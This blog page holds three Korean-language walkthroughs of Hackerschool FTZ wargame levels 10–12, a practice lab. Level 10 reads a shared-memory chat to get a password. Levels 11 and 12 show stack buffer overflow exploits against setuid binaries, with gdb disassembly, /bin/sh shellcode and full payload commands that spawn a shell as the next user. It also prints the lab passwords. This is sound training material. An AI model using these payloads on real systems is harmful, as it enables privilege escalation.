M4ndU의 만두만두한 블로그

PREV 1 ···140 141 142 143 144 145 146 ···153 NEXT

해커스쿨 FTZ [LEVEL12] 풀이

2018. 2. 9. 00:35

해커스쿨 FTZ [LEVEL12] 풀이

M4ndU

해커스쿨 FTZ [LEVEL12] 풀이입니다.

ID | level12

PW | it is like this

으로 로그인합니다.

$ ls -l

를 이용해 어떤 파일과 어떤 폴더가 있는지 확인하고,

$ cat hint

를 이용해 힌트를 확인합시다.

level12@192.168.31.128's password:

[level12@ftz level12]$ ls -l

total 28

-rwsr-x--- 1 level13 level12 13771 Mar 8 2003 attackme

-rw-r----- 1 root level12 204 Mar 8 2003 hint

drwxr-xr-x 2 root level12 4096 Feb 24 2002 public_html

drwxrwxr-x 2 root level12 4096 Jan 15 2009 tmp

[level12@ftz level12]$ cat hint

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

int main( void )

{

char str[256];

setreuid( 3093, 3093 );

printf( "문장을 입력하세요.\n" );

gets( str );

printf( "%s\n", str );

}

이번 문제도 level11과 같아보지만, main 함수의 인자가 아닌, gets 함수를 통해 입력값을 받는다는 것이 다른 것을 확인할 수 있습니다.

먼저 gdb로 분석을 합니다.

[level12@ftz tmp]$ gdb attackme -q

(gdb) set disassembly-flavor intel

(gdb) disas main

Dump of assembler code for function main:

0x08048470 <main+0>: push ebp

0x08048471 <main+1>: mov ebp,esp

0x08048473 <main+3>: sub esp,0x108

0x08048479 <main+9>: sub esp,0x8

0x0804847c <main+12>: push 0xc15

0x08048481 <main+17>: push 0xc15

0x08048486 <main+22>: call 0x804835c <setreuid>

0x0804848b <main+27>: add esp,0x10

0x0804848e <main+30>: sub esp,0xc

0x08048491 <main+33>: push 0x8048538

0x08048496 <main+38>: call 0x804834c <printf>

0x0804849b <main+43>: add esp,0x10

0x0804849e <main+46>: sub esp,0xc

0x080484a1 <main+49>: lea eax,[ebp-264]

0x080484a7 <main+55>: push eax

0x080484a8 <main+56>: call 0x804831c <gets>

0x080484ad <main+61>: add esp,0x10

0x080484b0 <main+64>: sub esp,0x8

0x080484b3 <main+67>: lea eax,[ebp-264]

0x080484b9 <main+73>: push eax

0x080484ba <main+74>: push 0x804854c

0x080484bf <main+79>: call 0x804834c <printf>

0x080484c4 <main+84>: add esp,0x10

0x080484c7 <main+87>: leave

0x080484c8 <main+88>: ret

0x080484c9 <main+89>: lea esi,[esi]

0x080484cc <main+92>: nop

0x080484cd <main+93>: nop

0x080484ce <main+94>: nop

0x080484cf <main+95>: nop

---Type <return> to continue, or q <return> to quit---

End of assembler dump.

*main+59 를 보면 ebp-264부터 입력을 받네요. level11과 스택구조가 동일한 것 같습니다.

낮은 주소

str[256]

dummy[8]

SFP[4]

RET[4]

높은 주소

이번에 풀때는 깔끔하게 환경변수를 이용해 풀어보겠습니다.

tmp폴더로 이동합니다.

그리고 다음 명령어를 순서대로 입력하여 실행합니다.

$export EGG=`python -c 'print "\x90"*15+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`

$echo 'int main() { printf("ADDR -> 0x%x\n", getenv("EGG")); } ' > getenv.c

$gcc getenv.c -o getenv

$./getenv

[level12@ftz level12]$ cd tmp

[level12@ftz tmp]$ export EGG=`python -c 'print "\x90"*15+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`

[level12@ftz tmp]$ echo 'int main() { printf("ADDR -> 0x%x\n", getenv("EGG")); } ' > getenv.c

[level12@ftz tmp]$ gcc getenv.c -o getenv

[level12@ftz tmp]$ ./getenv

ADDR -> 0xbffffc8d

0xbffffc8d를 리턴주소로 잡고 bof를 하면 됩니다.

이때 이 프로그램은 입력을 gets함수를 통해 받으므로 다른 형태로 프로그램을 실행해야 합니다.

(python -c 'print"\x90"*268+"\x8d\xfc\xff\xbf"'; cat) | ./attackme

이렇게요.

[level12@ftz tmp]$ cd ..

[level12@ftz level12]$ (python -c 'print"\x90"*268+"\x8d\xfc\xff\xbf"'; cat) | ./attackme

문장을 입력하세요.

릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱랛?

my-pass

TERM environment variable not set.

Level13 Password is "have no clue".

깔끔하죠? 레벨 떡상 가즈아ㅏㅏㅏㅏㅏㅏㅏㅏㅏㅏㅏㅏㅏㅏ

저작자표시 비영리 동일조건

'System Hacking > FTZ' 카테고리의 다른 글

해커스쿨 FTZ [LEVEL14] 풀이 (4)	2018.02.09
해커스쿨 FTZ [LEVEL13] 풀이 (2)	2018.02.09
해커스쿨 FTZ [LEVEL11] 풀이 (3)	2018.02.08
해커스쿨 FTZ [LEVEL10] 풀이 (0)	2018.02.07
해커스쿨 FTZ [LEVEL9] 풀이 (0)	2018.02.07

해커스쿨 FTZ [LEVEL11] 풀이

2018. 2. 8. 22:31

해커스쿨 FTZ [LEVEL11] 풀이

M4ndU

해커스쿨 FTZ [LEVEL11] 풀이입니다.

ID | level11

PW | what!@#$?

으로 로그인합니다.

$ ls -l

를 이용해 어떤 파일과 어떤 폴더가 있는지 확인하고,

$ cat hint

를 이용해 힌트를 확인합시다.

level11@192.168.31.128's password:

[level11@ftz level11]$ ls -l

total 28

-rwsr-x--- 1 level12 level11 13733 Mar 8 2003 attackme

-rw-r----- 1 root level11 168 Mar 8 2003 hint

drwxr-xr-x 2 root level11 4096 Feb 24 2002 public_html

drwxrwxr-x 2 root level11 4096 Jan 14 2009 tmp

[level11@ftz level11]$ cat hint

#include <stdio.h>

#include <stdlib.h>

int main( int argc, char *argv[] )

{

char str[256];

setreuid( 3092, 3092 );

strcpy( str, argv[1] );

printf( str );

}

이번에는 attackme라는 파일이 추가되었네요.

일단 hint를 확인해 봅시다.

attackme의 소스코드인 것 같습니다.

str의 크기는 256바이트인데 입력값의 크기를 제한하지 않네요.

이것을 보고 버퍼오버플로우 문제인 것을 알 수 있습니다.

그럼 이제 gdb를 통해 str과 RET의 거리를 알아봅시다.

[level11@ftz level11]$ gdb -q attackme

(gdb) set disassembly-flavor intel

(gdb) disas main

Dump of assembler code for function main:

0x08048470 <main+0>: push ebp

0x08048471 <main+1>: mov ebp,esp

0x08048473 <main+3>: sub esp,0x108

0x08048479 <main+9>: sub esp,0x8

0x0804847c <main+12>: push 0xc14

0x08048481 <main+17>: push 0xc14

0x08048486 <main+22>: call 0x804834c <setreuid>

0x0804848b <main+27>: add esp,0x10

0x0804848e <main+30>: sub esp,0x8

0x08048491 <main+33>: mov eax,DWORD PTR [ebp+12]

0x08048494 <main+36>: add eax,0x4

0x08048497 <main+39>: push DWORD PTR [eax]

0x08048499 <main+41>: lea eax,[ebp-264]

0x0804849f <main+47>: push eax

0x080484a0 <main+48>: call 0x804835c <strcpy>

0x080484a5 <main+53>: add esp,0x10

0x080484a8 <main+56>: sub esp,0xc

0x080484ab <main+59>: lea eax,[ebp-264]

0x080484b1 <main+65>: push eax

0x080484b2 <main+66>: call 0x804833c <printf>

0x080484b7 <main+71>: add esp,0x10

0x080484ba <main+74>: leave

---Type <return> to continue, or q <return> to quit---

0x080484bb <main+75>: ret

0x080484bc <main+76>: nop

0x080484bd <main+77>: nop

0x080484be <main+78>: nop

0x080484bf <main+79>: nop

End of assembler dump.

*main+41 과 *main+48 부분을 보면 ebp-264부터 입력값을 받는 것을 알 수 있네요.

str에 256바이트가 할당되었으므로 8바이트가 dummy (쓰레기값)으로 존재하는 것을 알 수 있습니다.

현재 스택구조를 다음과 같이 나타낼 수 있습니다:

낮은 주소

str[256]

dummy[8]

SFP[4]

RET[4]

높은 주소

우리는 25바이트 쉘코드를 사용하겠습니다.

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80

그리고 쉘코드 앞에 NOP을 의미하는 \x90으로 채우겠습니다.

268(str[256]+dummy[8]+SFP[4]) - 25(shellcode) = 243

"\x90"*243

이제 리턴주소를 구하기 위해 ebp-264의 주소를 알아보겠습니다.

ebp-264에 argv[1]을 덮어쓰는 작업을 하고 난 후인 *main+53 에 break point를 걸고

(gdb) b *main+53

Breakpoint 1 at 0x80484a5

argv[1]의 값으로 위에서 만든 코드 + 리턴주소를 입력하겠습니다.

`python -c 'print "\x90"*243+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"+"AAAA"'`

(gdb) r `python -c 'print "\x90"*243+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"+"AAAA"'`

Starting program: /home/level11/attackme `python -c 'print "\x90"*243+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"+"AAAA"'`

Couldn't get registers: Operation not permitted.

오류가 나네요...

파일을 tmp폴더로 복사해서 진행해야겠네요.

(gdb) q

The program is running. Exit anyway? (y or n) y

[1]+ Stopped gdb -q attackme

[level11@ftz level11]$ cp attackme tmp/

[level11@ftz level11]$ cd tmp

[level11@ftz tmp]$ gdb -q attackme

(gdb) b *main+53

Breakpoint 1 at 0x80484a5

(gdb) r `python -c 'print "\x90"*243+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"+"AAAA"'`

Starting program: /home/level11/tmp/attackme `python -c 'print "\x90"*243+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"+"AAAA"'`

Breakpoint 1, 0x080484a5 in main ()

스택을 확인해 봅시다.

(gdb) x/100 $esp

0xbffff430: 0xbffff440 0xbffffb23 0xbffff460 0x00000001

0xbffff440: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff450: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff460: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff470: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff480: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff490: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff4a0: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff4b0: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff4c0: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff4d0: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff4e0: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff4f0: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff500: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff510: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff520: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff530: 0x31909090 0x2f6850c0 0x6868732f 0x6e69622f

0xbffff440 부터 시작이 되네요. 리턴 주소로 0xbffff440으로 잡고 tmp/attackme 를 실행해보겠습니다.

./attackme `python -c 'print "\x90"*243+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"+"\x40\xf4\xff\xbf"'`

[level11@ftz tmp]$ ./attackme `python -c 'print "\x90"*243+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"+"\x40\xf4\xff\xbf"'`

Segmentation fault

음.. 아무래도 노가다가 필요해 보이네요. 쉘이 뜰때까지 리턴주소를 바꿔주며 반복시도 해보겠습니다.

Segmentation fault

[level11@ftz tmp]$ ./attackme `python -c 'print "\x90"*243+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"+"\x40\xfb\xff\xbf"'`

sh-2.05b$ exit

exit

0xbffffb40에서 성공했습니다!

이제 본래 문제 파일에서 시도하겠습니다.

[level11@ftz tmp]$ cd ..

[level11@ftz level11]$ ./attackme `python -c 'print "\x90"*243+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"+"\x40\xfb\xff\xbf"'`

sh-2.05b$ my-pass

TERM environment variable not set.

Level12 Password is "it is like this".

가즈으으ㅡ으으으아ㅏ아아ㅏ

저작자표시 비영리 동일조건

'System Hacking > FTZ' 카테고리의 다른 글

해커스쿨 FTZ [LEVEL13] 풀이 (2)	2018.02.09
해커스쿨 FTZ [LEVEL12] 풀이 (4)	2018.02.09
해커스쿨 FTZ [LEVEL10] 풀이 (0)	2018.02.07
해커스쿨 FTZ [LEVEL9] 풀이 (0)	2018.02.07
해커스쿨 FTZ [LEVEL8] 풀이 (0)	2018.02.07

해커스쿨 FTZ [LEVEL10] 풀이

2018. 2. 7. 21:15

해커스쿨 FTZ [LEVEL10] 풀이

M4ndU

해커스쿨 FTZ [LEVEL10] 풀이입니다.

ID | level10

PW | interesting to hack!

으로 로그인합니다.

$ ls -l

를 이용해 어떤 파일과 어떤 폴더가 있는지 확인하고,

$ cat hint

를 이용해 힌트를 확인합시다.

level10@192.168.31.128's password:

[level10@ftz level10]$ ls -l

total 16

-rw-r----- 1 root level10 253 Jan 14 2010 hint

drwxr-x--- 2 root root 4096 Mar 29 2003 program

drwxr-xr-x 2 root level10 4096 Feb 24 2002 public_html

drwxrwxr-x 2 root level10 4096 Jan 16 2009 tmp

[level10@ftz level10]$ cat hint

두명의 사용자가 대화방을 이용하여 비밀스런 대화를 나누고 있다.

그 대화방은 공유 메모리를 이용하여 만들어졌으며,

key_t의 값은 7530이다. 이를 이용해 두 사람의 대화를 도청하여

level11의 권한을 얻어라.

- 레벨을 완료하셨다면 소스는 지우고 나가주세요.

공유 메모리에 관한 문제입니다.

공유 메모리에 대해 공부를 하고 옵시다!!! (구글링)

....

하고 오셨나여?

일단 공유 메모리와 관련된 명령어인 ipcs를 사용해봅시다.

[level10@ftz level10]$ ipcs

------ Shared Memory Segments --------

key shmid owner perms bytes nattch status

0x00001d6a 0 root 666 1028 0

------ Semaphore Arrays --------

key semid owner perms nsems

------ Message Queues --------

key msqid owner perms used-bytes messages

key가 0x00001d6a = 7530 인 것이 있네요.

이제 tmp 폴더로 이동해서 코드를 작성합시다.

[level10@ftz level10]$ cd tmp

[level10@ftz tmp]$ vi level10.c

#include<stdio.h>

#include<sys/ipc.h>

#include<sys/shm.h>

int main(){

int a;

char* b;

a = shmget(7530, 1028, IPC_CREAT|0666);

b = shmat(a, NULL, 0);

printf("%s", b);

}

컴파일후, 실행해 줍시다.

[level10@ftz tmp]$ gcc -o level10 level10.c

[level10@ftz tmp]$ ./level10

멍멍: level11의 패스워드는?

구타: what!@#$?

다음 레벨로~ 가즈아~

저작자표시 비영리 동일조건

'System Hacking > FTZ' 카테고리의 다른 글

해커스쿨 FTZ [LEVEL12] 풀이 (4)	2018.02.09
해커스쿨 FTZ [LEVEL11] 풀이 (3)	2018.02.08
해커스쿨 FTZ [LEVEL9] 풀이 (0)	2018.02.07
해커스쿨 FTZ [LEVEL8] 풀이 (0)	2018.02.07
해커스쿨 FTZ [LEVEL7] 풀이 (0)	2018.02.07

PREV 1 ···140 141 142 143 144 145 146 ···153 NEXT

M4ndU의 만두만두한 블로그

해커스쿨 FTZ [LEVEL12] 풀이

'System Hacking > FTZ' 카테고리의 다른 글

해커스쿨 FTZ [LEVEL11] 풀이

'System Hacking > FTZ' 카테고리의 다른 글

해커스쿨 FTZ [LEVEL10] 풀이

'System Hacking > FTZ' 카테고리의 다른 글

+ Recent posts

티스토리툴바